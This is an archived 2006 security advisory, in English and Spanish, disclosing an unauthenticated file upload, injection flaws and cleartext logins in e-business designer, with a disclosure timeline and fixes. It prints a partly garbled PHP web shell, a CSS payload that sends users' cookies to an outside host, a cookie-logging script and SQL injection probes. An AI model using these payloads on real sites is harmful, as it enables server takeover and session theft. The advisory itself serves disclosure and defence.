AOH :: HP Unsorted E :: B06-2183.HTM

E-business designer - several flaws (ebd)



Several flaws in e-business designer (eBD)
Several flaws in e-business designer (eBD)



------=_Part_16839_12721304.1147383657176
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: base64
Content-Disposition: inline

UmVnYXJkcwo------=_Part_16839_12721304.1147383657176
Content-Type: text/plain; name=eBD-en.txt; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: quoted-printable
X-Attachment-Id: f_en22xdgm
Content-Disposition: attachment; filename="eBD-en.txt"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


          ==============================                   - Advisory -
          ==============================
  Tittle:   Several flaws in e-business designer
    Risk:   Critical
    Date:   03.May.2006
  Author:   Pedro And=FAjar 
URL: http://www.digitalsec.es 
http://www.514.es/=09 


.: [ INTRO ] :.
=09
  eBD is an Integrated Development Environment for the development and publication of web sites,
web applications and web services (Applications). In about 60% of the time typically  required, 
Designer expedites the creation of Applications based on an open architecture, accepted web 
standards and without the need for in-depth knowledge about web technology.

  With eBD, you can develop any type of web application, web site or web service - intranet, 
extranet, eCommerce, eLearning portals, etc. You can deploy legacy applications on the web 
without re-coding the original application.

  eBusiness Designer has three distinct functional layers - Presentation, Data and Back Office. 
This structure permits a non-technical staff member to update any Application in real time, 
preview and publish it.


.: [ TECHNICAL DESCRIPTION ] :.

  During the development of some evaluation tasks against applications managed by the e-businness 
designer software, several bugs were discovered:


.: [ BUG #1 ]

Risk                : High
Description         : Ability to upload files to the system without authentication
Affected versions   : <= v3.1.4

  Access to a web edition tool without authentication, allow remote users to upload files without
restriction. This vulnerability can be achieved accessing the following URL:

http://ebdsite/common/html_editor/image_browser.upload.html 

  The file can be placed in different folders of the application, usually it can be easily found
exploring the web source code and searching the images folder. Another useful tool to
find the file is:

http://edbsite/common/html_editor/image_browser.html 

  Additionally we have the html edition tool, whose parameters are:

  function abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links)
  {
  =09var argumentos = "form_name=" + form_name + "&name=" + name + "&source=" + source +
=09=09=09"&ebd_links=" + links;

=09if (idvista != null && idvista > 0)
=09=09argumentos += "&usar_vista=" + idvista;
=09
=09if (atributo != null && atributo.length > 0)
=09=09argumentos += "&usar_atributo=" + atributo;

=09var href = "/common/html_editor/html_editor.html?"


 The result of this vulnerability consists in the ability of upload and/or modify files in
the system, giving the possiblity of attack both the server and web users.

These kind of attacks were succeded against a server running 2.3.3 version of eBD:

Server side exploiting:
+ Code execution in the system using php/asp...shells : If the system has php installed, 
command execution is possible through a web browser, uploading a file with the following content:


=09----------------dsr.php-----------------
=09&1");

=09echo "
$out
"; =09 ?> =09----------------dsr.php----------------- Then, queries like "http://edbsite/path/to/dsr.php&cmd=uname -a ; id" can be executed. Client side exploiting: + Cross Site Scripting (XSS), in applications with authentication methods: Uploaded files with "image_browser.upload.html" can overwrite application files, so it will be possible to include a javascript code in a cascade style sheet (.css), which will send us the cookie of users who have logged, through a get request to our server: background: url('javascript:document.images[1].src="http://514.es/514.php?"+document.cookie;') repeat-x bottom; We can place a script in our server to log cookies we receive, even this job is already done by the access_log. XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] "GET /514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651 HTTP/1.1" 200 316 "http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" =09 =09 Possible script: =09 -----------------514.php------------------ =09 $srv) { =09 file_put_contents($log, "$key=$srv\n", FILE_APPEND); =09 } =09 if (isset ($_GET) && count($_GET) > 0) { =09 file_put_contents($log, "GET params\n", FILE_APPEND); =09 foreach ($_GET as $key => $srv) { =09 file_put_contents($log, "$key=$srv\n", FILE_APPEND); =09 } =09 } =09 if (isset ($_POST) && count($_POST) > 0) { =09 file_put_contents($log, "POST params\n", FILE_APPEND); =09 foreach ($_POST as $key => $srv) { =09 file_put_contents($log, "$key=$srv\n", FILE_APPEND); =09 } =09 } =09 file_put_contents($log, "\n", FILE_APPEND); =09 if ($img_type == "png") { =09 Header("Content-type: image/png"); =09 ImagePNG(load_png("imgs/514.png")); =09 } =09 if ($img_type == "jpg") { =09 Header("Content-type: image/jpeg"); =09 ImageJPEG(load_jpg("imgs/514.jpg")); =09 } =09 if ($img_type == "gif") { =09 Header("Content-type: image/gif"); =09 ImageGIF(load_gif("imgs/514.gif")); =09 } =09 ?> =09 -----------------514.php------------------ Adicionally was checked that there is no max concurrent sessions number for each user. This make easier this kind of attacks, because the cookies obtained by this way can be used as the same time that the legitimate user. .: [ BUG #2 ] Risk : High Description : Imput validation error Affected Versions : v2.3.3 without auth v3.1.4 require admin access In some parameters that are parsed by eBD, inclusion of special characters is not checked, so XSS or code injection attacks are possible. http://ebdsite/admin/form_grupo.html?id= This query will give us an "alert" msg, and the server will response with a SQL message, including the path of the application: ERROR en: SELECT * FROM Contenido C WHERE C.idContenido=' AND 1=1 AND ( idArea IS NULL OR idArea=3 ) -- You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND 1=1 AND ( idArea IS NULL OR idArea=3 )' at line 1 at /usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm line 179. Stack: [/usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm:179], [/usr/eBD/ebd_modules/eBD/DB/DBDriver.pm:377], [/usr/eBD/ebd_modules/eBD.pm:772], [/usr/eBD/ebd_modules/eBD/Contenido.pm:453], [/usr/eBD/htdocs/transhotel/archivos/dhandler:28], [/usr/eBD/htdocs/ebdsite/archivos/autohandler:3] Same error on version 2.3.3 of eBD with the following path requests : =09* http://ebdsite/archivos/' or =09* http://ebdsite/files/' .: [ BUG #3 ] Risk : Medium Description : Clear password on auth Affected Versions : <= v3.1.4 In the authentication step, through http (by default) instead of https, username and password fields are in plain text during posting: zona=inicial&username=DSR&password=514&entrar=Login .: [ CHANGELOG ] :. * 24/Apr/2006: - Several flaws discovered, during the evaluation of the software installed by a e-business designer customer. * 25/Apr/2006: - Explotation of these discovered flaws. - Asked for security contact at eBD. * 26/Apr/2006: - Rough draft of this document finished. - Advisory sent to . - Commentaries of eBD. Affected versions of each flaw cleared. * 27/Apr/2006: - Some changes in this text. * 02/May/2006: - Oasyssoft releases emergency patch for file uploading bug. =09=09=09 (http://lists.oasyssoft.com/ebd-devel/200605/msg00000.html) * 03/May/2006 - New comments and changes in the adv. * 10/May/2006: - Public disclosure. .: [ SOLUTIONS ] :. - Update to the last available version (3.1.4) - Emergency Patch instalation. (http://lists.oasyssoft.com/ebd-devel/200605/binNr7awTFdvt.bin) (Waiting for final release on early June) - Others: + Disable the directory listing in the web server. =09+ Force the navigation through https. =09+ Disable php and/or asp support in the system if it is not required. =09+ Apply firewall solutions or ModSecurity related. =09+ Delete test accounts and check for strong passwords. .: [ ACKNOWLEDGEMENTS ] :. Thanks To A. Tarasc=F3 and J. Olascoaga for Xss help. Thanks to Gandalfj for the translation. Greetings to bRaCu and ppl of !dSR, 514, haxorcitos and dlnd-0. .: [ REFERENCES ] :. [+] [eBD] e-business designer http://www.ebdsoft.com/ [+] Cross Site Scripting FAQ http://www.cgisecurity.com/articles/xss-faq.shtml [+] NGS Advanced Sql Injection http://www.ngssoftware.com/papers/advanced_sql_injection.pdf [+] ModSecurity (Open source web application firewall) http://www.modsecurity.org/ [+] Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html [+] !dSR - Digital Security Research http://www.digitalsec.net/ [+] 514 - 77 http://www.514.es/ -=EOF=- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEYS506RyAqE6uiLQRAu5jAKChfRoY2NRxEyEUwm/glbQunkgUYACggsey BkJxd4e5M6WlaT0iLvcm/B0=ohKq -----END PGP SIGNATURE----- ------=_Part_16839_12721304.1147383657176 Content-Type: text/plain; name=eBD-es.txt; charset=ANSI_X3.4-1968 Content-Transfer-Encoding: quoted-printable X-Attachment-Id: f_en22yki3 Content-Disposition: attachment; filename="eBD-es.txt" -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================== - Advisory - ============================== T=EDtulo: M=FAltiples vulnerabilidades en e-business designer Gravedad: Cr=EDtica Fecha: 03.May.2006 Autor: Pedro And=FAjar WEB: http://www.digitalsec.es http://www.514.es/ .: [ INTRODUCCI=D3N ] :. =09 eBD es una potente herramienta de desarrollo integral que permite la producci=F3n, gesti=F3n y publicaci=F3n de informaci=F3n mediante Internet o una Intranet, desde un navegador web, sin necesidad de implementaciones complejas ni costosas. Con eBD se puede desarrollar cualquier tipo de aplicaci=F3n web, ya sea intranet, extranet, portal, etc. o bien integrar cualquier otro desarrollo o aplicaci=F3n ya implantada, permitiendo el acceso y la gesti=F3n de la informaci=F3n de forma centralizada en un =FAnico entorno Web. Esta herramienta est=E1 extensamente utilizada en ayuntamientos y hospitales de toda Espa=F1a as=ED como otras conocidas empresas: d-link, Terra, RTVE, Banesto... .: [ DESCRIPCI=D3N T=C9CNICA ] :. Durante el desarrollo de unas pruebas de evaluaci=F3n sobre varias aplicaciones gestionadas por el software e-businness designer, se detectaron los siguientes fallos: .: [ DEFECTO #1 ] Gravedad: Alta T=EDtulo: Posibilidad de subir ficheros al sistema sin autenticaci=F3n. Afecta: <= v3.1.4 El acceso una a herramienta de edici=F3n web sin autenticaci=F3n, permite a usuarios remotos la subida de ficheros al sistema sin control de la extensi=F3n. Esta vulnerabilidad puede ser explotada accediendo directamente a la siguiente URL: http://ebdsite/common/html_editor/image_browser.upload.html El fichero puede ser colocado en diversos directorios de la aplicaci=F3n, por norma general es facilmente localizable explorando el c=F3digo fuente de la web y buscando el directorio de im=E1genes. Otra herramienta de utilidad para localizar el fichero es: http://edbsite/common/html_editor/image_browser.html Adicionalmente se encuentra la herramienta de edici=F3n html, cuyos par=E1mentros son: function abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links) { =09var argumentos = "form_name=" + form_name + "&name=" + name + "&source=" + source + =09=09=09"&ebd_links=" + links; =09if (idvista != null && idvista > 0) =09=09argumentos += "&usar_vista=" + idvista; =09 =09if (atributo != null && atributo.length > 0) =09=09argumentos += "&usar_atributo=" + atributo; =09var href = "/common/html_editor/html_editor.html?" El resultado de esta vulnerabilidad, consiste en la posibilidad de subir y/o modificar ficheros en el sistema, provocando una alta posibilidad de ataque tanto en el servidor como en los clientes. Podr=EDamos modificar una imagen de la web con un exploit que atacar=EDa los navegadores de los usuarios de la web. Este tipo de ataques fueron realizados con exito sobre un server corriendo una versi=F3n 2.3.3 de eBD: Server side exploiting: +Ejecuci=F3n de c=F3digo en el sistema mediante el uso de php/asp... shells: Si el sistema tiene instalado php, es posible ejecutar comandos a trav=E9s del navegador, subiendo un fichero con el siguiente contenido: - - - ----------------dsr.php----------------- &1"); echo "
$out
"; ?> - - - ----------------dsr.php----------------- Posteriormente se podr=E1n ejecutar comandos tal que http://edbsite/path/to/dsr.php&cmd=uname -a ; id Client side exploiting: +Ataques de Cross Site Scripting (XSS), en aplicaciones con autenticaci=F3n: Puesto que los ficheros subidos mediante "image_browser.upload.html", puedes sobreescribir ficheros l=E9gitimos de la aplicaci=F3n, ser=EDa posible introducir en un archivo de estilos (.css) un javascript, que nos enviar=E1 las cookies de los usuarios que inicien sesi=F3n, mediante una petici=F3n get al nuestro servidor: background: url('javascript:document.images[1].src="http://514.es/514.php?"+document.cookie;') repeat-x bottom; En nuestro server podemos colocar un script para loggear las cookies que recibamos, aunque ya aparecen de igual forma grabadas en el access_log. XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] "GET /514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651 HTTP/1.1" 200 316 "http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" Este script podr=EDa ser: - - - -----------------514.php------------------ $srv) { file_put_contents($log, "$key=$srv\n", FILE_APPEND); } if (isset ($_GET) && count($_GET) > 0) { file_put_contents($log, "GET params\n", FILE_APPEND); foreach ($_GET as $key => $srv) { file_put_contents($log, "$key=$srv\n", FILE_APPEND); } } if (isset ($_POST) && count($_POST) > 0) { file_put_contents($log, "POST params\n", FILE_APPEND); foreach ($_POST as $key => $srv) { file_put_contents($log, "$key=$srv\n", FILE_APPEND); } } file_put_contents($log, "\n", FILE_APPEND); if ($img_type == "png") { Header("Content-type: image/png"); ImagePNG(load_png("imgs/514.png")); } if ($img_type == "jpg") { Header("Content-type: image/jpeg"); ImageJPEG(load_jpg("imgs/514.jpg")); } if ($img_type == "gif") { Header("Content-type: image/gif"); ImageGIF(load_gif("imgs/514.gif")); } ?> - - - -----------------514.php------------------ Adicionalmente, se ha comprobado que no existe un n=FAmero m=E1ximo de sesiones concurrentes para cada usuario. Esta caracter=EDstica facilita este tipo de ataques, ya que las cookies obtenidas de esa forma pueden ser utilizadas a la vez que el usuario leg=EDtimo. .: [ DEFECTO #2 ] Gravedad: Alta T=EDtulo: Error en la validaci=F3n de datos de entrada Afecta: v2.3.3 no requiere usuario v3.1.4 requiere autenticarse como administrador En varios par=E1metros que parsea eBD, no se verifica la inclusi=F3n de caracteres especiales y por tanto son posibles los ataques de injecci=F3n de c=F3digo o cross site scripting. Ej: http://ebdsite/admin/form_grupo.html?id= Esta URL ejecutar=E1 el alert y adem=E1s el servidor nos devolver=E1 la cadena SQL y el path f=EDsico de la aplicaci=F3n tal que: ERROR en: SELECT * FROM Contenido C WHERE C.idContenido=' AND 1=1 AND ( idArea IS NULL OR idArea=3 ) -- You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND 1=1 AND ( idArea IS NULL OR idArea=3 )' at line 1 at /usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm line 179. Stack: [/usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm:179], [/usr/eBD/ebd_modules/eBD/DB/DBDriver.pm:377], [/usr/eBD/ebd_modules/eBD.pm:772], [/usr/eBD/ebd_modules/eBD/Contenido.pm:453], [/usr/eBD/htdocs/transhotel/archivos/dhandler:28], [/usr/eBD/htdocs/ebdsite/archivos/ autohandler:3] Lo mismo ocurre en la versi=F3n 2.3.3 de eBD al hacer peticiones al siguiente path: * http://ebdsite/archivos/' o bien * http://ebdsite/files/' .: [ DEFECTO #3 ] Gravedad: Media T=EDtulo: Ausencia de cifrado en proceso de autenticaci=F3n Afecta: <= v3.1.4 En el momento de la autenticaci=F3n, que por defecto se produce v=EDa http en lugar de https, los campos de usuario y contrase=F1a viajan por la red en texto claro, sin ning=FAn tipo de ecodeado: zona=inicial&username=DSR&password=514&entrar=Login .: [ HISTORICO ] :. * 24/Abr/2006: - Descubiertos varios fallos, durante la evaluaci=F3n del software instalado en un cliente de e-business designer. * 25/Abr/2006: - Explotaci=F3n de los fallos descubiertos anteriormente. - Localizaci=F3n del contacto de seguridad de eBD. * 26/Abr/2006: - Redactado borrador de este documento. - Envio del advisory a . - Comentarios por parte de eBD. Se indican las versiones afectadas por cada vulnerabilidad. * 27/Abr/2006: - Modificaciones sobre el borrador. * 02/May/2006: - Oasyssoft publica un parche sobre la subida de ficheros. (http://lists.oasyssoft.com/ebd-devel/200605/msg00000.html) * 03/May/2006 - Nuevos comentarios y modificaciones en el advisory. * 10/May/2006: - Publicaci=F3n del advisory. .: [ RECOMENDACIONES ] :. - - - - Actualizaci=F3n inmediata del software a la =FAltima versi=F3n disponible (3.1.4). - - - - Implantaci=F3n del parche de emergencia. (http://lists.oasyssoft.com/ebd-devel/200605/binNr7awTFdvt.bin) (A la espera de la release final para comienzos de Junio) - - - - Adicionalmente es recomendable: + Deshabilitar el listado de directorios en el servidor web. + Forzar la navegaci=F3n sobre https en la medida de lo posible. + Eliminar el soporte php y/o asp del sistema si lo hubiera (y no fuera requerido). + Implementaci=F3n de firewalls de aplicaci=F3n o soluciones semejantes a ModSecurity. + Eliminar cuentas de prueba y verificar que las contrase=F1as son robustas. .: [ RECONOCIMIENTOS ] :. Gracias a A. Tarasc=F3 y J. Olascoaga por la ayuda con el XSS. Saludos al bRaCu y la gente de !dSR, 514, haxorcitos y dlnd-0. .: [ REFERENCIAS ] :. [+] [eBD] e-business designer http://www.ebdsoft.com/ [+] Cross Site Scripting FAQ http://www.cgisecurity.com/articles/xss-faq.shtml [+] NGS Advanced Sql Injection http://www.ngssoftware.com/papers/advanced_sql_injection.pdf [+] ModSecurity (Open source web application firewall) http://www.modsecurity.org/ [+] Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html [+] !dSR - Digital Security Research http://www.digitalsec.net/ [+] 514 - 77 http://www.514.es/ -=EOF=- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEYS8Y6RyAqE6uiLQRApovAJ9RJhlPSdSarR2IjrEFV/H82aNSiwCeItD9 PKHJ4Nxn11SCt6ANlG5WqA8=2PpH -----END PGP SIGNATURE----- ------=_Part_16839_12721304.1147383657176--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.